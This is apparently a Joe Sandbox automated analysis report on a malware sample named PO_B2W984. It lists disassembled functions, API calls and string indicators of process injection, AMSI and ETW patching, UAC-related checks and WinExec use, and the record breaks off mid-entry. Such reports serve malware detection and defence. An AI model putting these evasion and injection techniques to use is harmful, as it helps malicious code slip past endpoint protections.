2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c ResumeThread call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c CloseHandle call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2de7ecc call 2de8798 * 6 CloseHandle call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 5674->5992 5675->5674 5822->5553 5823->5822 5991->5992 5992->5463
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F257DC,02F25820,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C), ref: 02DF7E31
                                                                                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0), ref: 02DF847B
                                                                                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C), ref: 02DF85FA
                                                                                                                                          • Part of subcall function 02DE8798: LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                          • Part of subcall function 02DE8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                          • Part of subcall function 02DE8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02E3137C,02DFAFD0,UacInitialize,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C), ref: 02DF89EC
                                                                                                                                          • Part of subcall function 02DD7E10: GetFileAttributesA.KERNEL32(00000000,?,02DEF8C4,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,UacInitialize), ref: 02DD7E1B
                                                                                                                                          • Part of subcall function 02DEDAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDB96), ref: 02DEDB03
                                                                                                                                          • Part of subcall function 02DEDAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DEDB3D
                                                                                                                                          • Part of subcall function 02DEDAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DEDB6A
                                                                                                                                          • Part of subcall function 02DEDAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DEDB73
                                                                                                                                          • Part of subcall function 02DE8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DE820E), ref: 02DE81F0
                                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,Initialize,02E3137C,02DFAFD0,00000000,00000000,00000000,ScanString,02E3137C,02DFAFD0), ref: 02DFAA1D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                        • API String ID: 2481178504-1225450241
                                                                                                                                        • Opcode ID: eaca3ff9a380ad1a89f624bd33a614495d6f1bd8de6db6d30ec67108fbfd3883
                                                                                                                                        • Instruction ID: 8c35143d972335dac61c3c255c90d87bc5575e852beddf22c0a2654ae28a4a99
                                                                                                                                        • Opcode Fuzzy Hash: eaca3ff9a380ad1a89f624bd33a614495d6f1bd8de6db6d30ec67108fbfd3883
                                                                                                                                        • Instruction Fuzzy Hash: FE433179A405589FDB21FB64DD809DE73BAFF88300F1240E6E10AEB754DA709E858F64
                                                                                                                                        Function 02DD1724 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 289sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8535 2dd1724-2dd1736 8536 2dd173c-2dd174c 8535->8536 8537 2dd1968-2dd196d 8535->8537 8540 2dd174e-2dd175b 8536->8540 8541 2dd17a4-2dd17ad 8536->8541 8538 2dd1a80-2dd1a83 8537->8538 8539 2dd1973-2dd1984 8537->8539 8547 2dd1a89-2dd1a8b 8538->8547 8548 2dd1684-2dd16ad VirtualAlloc 8538->8548 8544 2dd1938-2dd1945 8539->8544 8545 2dd1986-2dd19a2 8539->8545 8542 2dd175d-2dd176a 8540->8542 8543 2dd1774-2dd1780 8540->8543 8541->8540 8546 2dd17af-2dd17bb 8541->8546 8549 2dd176c-2dd1770 8542->8549 8550 2dd1794-2dd17a1 8542->8550 8552 2dd17f0-2dd17f9 8543->8552 8553 2dd1782-2dd1790 8543->8553 8544->8545 8551 2dd1947-2dd195b Sleep 8544->8551 8554 2dd19a4-2dd19ac 8545->8554 8555 2dd19b0-2dd19bf 8545->8555 8546->8540 8556 2dd17bd-2dd17c9 8546->8556 8557 2dd16df-2dd16e5 8548->8557 8558 2dd16af-2dd16dc call 2dd1644 8548->8558 8551->8545 8559 2dd195d-2dd1964 Sleep 8551->8559 8564 2dd182c-2dd1836 8552->8564 8565 2dd17fb-2dd1808 8552->8565 8560 2dd1a0c-2dd1a22 8554->8560 8561 2dd19d8-2dd19e0 8555->8561 8562 2dd19c1-2dd19d5 8555->8562 8556->8540 8563 2dd17cb-2dd17de Sleep 8556->8563 8558->8557 8559->8544 8572 2dd1a3b-2dd1a47 8560->8572 8573 2dd1a24-2dd1a32 8560->8573 8568 2dd19fc-2dd19fe call 2dd15cc 8561->8568 8569 2dd19e2-2dd19fa 8561->8569 8562->8560 8563->8540 8567 2dd17e4-2dd17eb Sleep 8563->8567 8574 2dd18a8-2dd18b4 8564->8574 8575 2dd1838-2dd1863 8564->8575 8565->8564 8570 2dd180a-2dd181e Sleep 8565->8570 8567->8541 8583 2dd1a03-2dd1a0b 8568->8583 8569->8583 8570->8564 8585 2dd1820-2dd1827 Sleep 8570->8585 8579 2dd1a49-2dd1a5c 8572->8579 8580 2dd1a68 8572->8580 8573->8572 8576 2dd1a34 8573->8576 8581 2dd18dc-2dd18eb call 2dd15cc 8574->8581 8582 2dd18b6-2dd18c8 8574->8582 8577 2dd187c-2dd188a 8575->8577 8578 2dd1865-2dd1873 8575->8578 8576->8572 8587 2dd188c-2dd18a6 call 2dd1500 8577->8587 8588 2dd18f8 8577->8588 8578->8577 8586 2dd1875 8578->8586 8589 2dd1a6d-2dd1a7f 8579->8589 8590 2dd1a5e-2dd1a63 call 2dd1500 8579->8590 8580->8589 8596 2dd18fd-2dd1936 8581->8596 8600 2dd18ed-2dd18f7 8581->8600 8591 2dd18cc-2dd18da 8582->8591 8592 2dd18ca 8582->8592 8585->8565 8586->8577 8587->8596 8588->8596 8590->8589 8591->8596 8592->8591
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,?,02DD2000), ref: 02DD17D0
                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,02DD2000), ref: 02DD17E6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: 0`$2
                                                                                                                                        • API String ID: 3472027048-3539502353
                                                                                                                                        • Opcode ID: 3b2f8f9913c85ab9fb57c85fd085bf3c67da1bd894910d2637a234c7ccbbb3c3
                                                                                                                                        • Instruction ID: 44d3bca820253f9c3002a5e4804f76c5aa7f6bd0d2d7ac8cd990550187175274
                                                                                                                                        • Opcode Fuzzy Hash: 3b2f8f9913c85ab9fb57c85fd085bf3c67da1bd894910d2637a234c7ccbbb3c3
                                                                                                                                        • Instruction Fuzzy Hash: BEB14572A80B618BD725CF29E880355BBE1EB84310F0D86AED54E8F385C770EC95CB90
                                                                                                                                        Function 02DD1A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 10477 2dd1a8c-2dd1a9b 10478 2dd1b6c-2dd1b6f 10477->10478 10479 2dd1aa1-2dd1aa5 10477->10479 10482 2dd1c5c-2dd1c60 10478->10482 10483 2dd1b75-2dd1b7f 10478->10483 10480 2dd1b08-2dd1b11 10479->10480 10481 2dd1aa7-2dd1aae 10479->10481 10480->10481 10490 2dd1b13-2dd1b27 Sleep 10480->10490 10486 2dd1adc-2dd1ade 10481->10486 10487 2dd1ab0-2dd1abb 10481->10487 10488 2dd16e8-2dd170b call 2dd1644 VirtualFree 10482->10488 10489 2dd1c66-2dd1c6b 10482->10489 10484 2dd1b3c-2dd1b49 10483->10484 10485 2dd1b81-2dd1b8d 10483->10485 10484->10485 10498 2dd1b4b-2dd1b5f Sleep 10484->10498 10491 2dd1b8f-2dd1b92 10485->10491 10492 2dd1bc4-2dd1bd2 10485->10492 10495 2dd1ae0-2dd1af1 10486->10495 10496 2dd1af3 10486->10496 10493 2dd1abd-2dd1ac2 10487->10493 10494 2dd1ac4-2dd1ad9 10487->10494 10508 2dd170d-2dd1714 10488->10508 10509 2dd1716 10488->10509 10490->10481 10497 2dd1b2d-2dd1b38 Sleep 10490->10497 10500 2dd1b96-2dd1b9a 10491->10500 10492->10500 10502 2dd1bd4-2dd1bd9 call 2dd14c0 10492->10502 10495->10496 10501 2dd1af6-2dd1b03 10495->10501 10496->10501 10497->10480 10498->10485 10503 2dd1b61-2dd1b68 Sleep 10498->10503 10505 2dd1bdc-2dd1be9 10500->10505 10506 2dd1b9c-2dd1ba2 10500->10506 10501->10483 10502->10500 10503->10484 10505->10506 10513 2dd1beb-2dd1bf2 call 2dd14c0 10505->10513 10510 2dd1bf4-2dd1bfe 10506->10510 10511 2dd1ba4-2dd1bc2 call 2dd1500 10506->10511 10514 2dd1719-2dd1723 10508->10514 10509->10514 10515 2dd1c2c-2dd1c59 call 2dd1560 10510->10515 10516 2dd1c00-2dd1c28 VirtualFree 10510->10516 10513->10506
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,?), ref: 02DD1B17
                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?), ref: 02DD1B31
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: 0`
                                                                                                                                        • API String ID: 3472027048-3339448193
                                                                                                                                        • Opcode ID: 8c7f08a0e1bfb254ef4fb845316ec23f3a65bca9dcad7c4289246d9b5d4dca67
                                                                                                                                        • Instruction ID: d4622132f09903f02dcd302b39e0ca211c535eac1e6c90c2717a71f0fe8b9206
                                                                                                                                        • Opcode Fuzzy Hash: 8c7f08a0e1bfb254ef4fb845316ec23f3a65bca9dcad7c4289246d9b5d4dca67
                                                                                                                                        • Instruction Fuzzy Hash: B251FF71640B408FE725CF68D984766BBD1EB46314F1985AED44DCB382E7B0DC89CBA0
                                                                                                                                        Function 02DE8704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 02DE870D
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                          • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DE876C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                                                                        • API String ID: 941070894-2671292670
                                                                                                                                        • Opcode ID: 1a2bb198c1e861557d916074efe55d46dae0a7172fe47cb4875a4d49bcb87d9d
                                                                                                                                        • Instruction ID: b326fb363068eb3407ccdc358dde2c86f9c78a90e3c52edf1c30a3378742fbdf
                                                                                                                                        • Opcode Fuzzy Hash: 1a2bb198c1e861557d916074efe55d46dae0a7172fe47cb4875a4d49bcb87d9d
                                                                                                                                        • Instruction Fuzzy Hash: F6F0AF5044C381B9E600F678DC45F4BBECD8B92224F048A48F1E99A3D2D679D5049BB7
                                                                                                                                        Function 02DEE2EE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DEE42E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                                        • Opcode ID: 0d1112403a76d79da4c386a01d78ac0b9d93596b48329f3b06c0096707633efb
                                                                                                                                        • Instruction ID: b00065fd668c3480578a62708568ffded210970eac7b0dcde966411da90eac44
                                                                                                                                        • Opcode Fuzzy Hash: 0d1112403a76d79da4c386a01d78ac0b9d93596b48329f3b06c0096707633efb
                                                                                                                                        • Instruction Fuzzy Hash: 39413A35B50548ABEF11FBA4D881ADEB3FAEF48720F218426E042A7354DA74ED058F74
                                                                                                                                        Function 02DE881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                        • GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        • FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1543721669-0
                                                                                                                                        • Opcode ID: e43f5fe3201f7c158b1685cda86377b131f3b4b5302c9852eef501cb8652cff4
                                                                                                                                        • Instruction ID: 75b07e3b52e8774c781dbc668edcd6fb4babd2533e951a164d2f5d155814cc66
                                                                                                                                        • Opcode Fuzzy Hash: e43f5fe3201f7c158b1685cda86377b131f3b4b5302c9852eef501cb8652cff4
                                                                                                                                        • Instruction Fuzzy Hash: 98118470A80744ABEF00FBA5DC09A6E77ADDB45701F4244A8B509EBB90CA74DD458FA4
                                                                                                                                        Function 02DE8406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02DE8470
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                                        • Opcode ID: 8eb927e98e72879fec56bb09da034cc8676f2bc5a7042ddbdf4f7befaa2bc7f6
                                                                                                                                        • Instruction ID: ccbd8014177464468e3a63d5e56ca22464b8acc33e9d436ac9b5abcc092788a5
                                                                                                                                        • Opcode Fuzzy Hash: 8eb927e98e72879fec56bb09da034cc8676f2bc5a7042ddbdf4f7befaa2bc7f6
                                                                                                                                        • Instruction Fuzzy Hash: 07018134680608BFEB11FFA5DC41B5A77EEEB48710F628460B505DBB50D674AD009E34
                                                                                                                                        Function 02DE8408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02DE8470
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
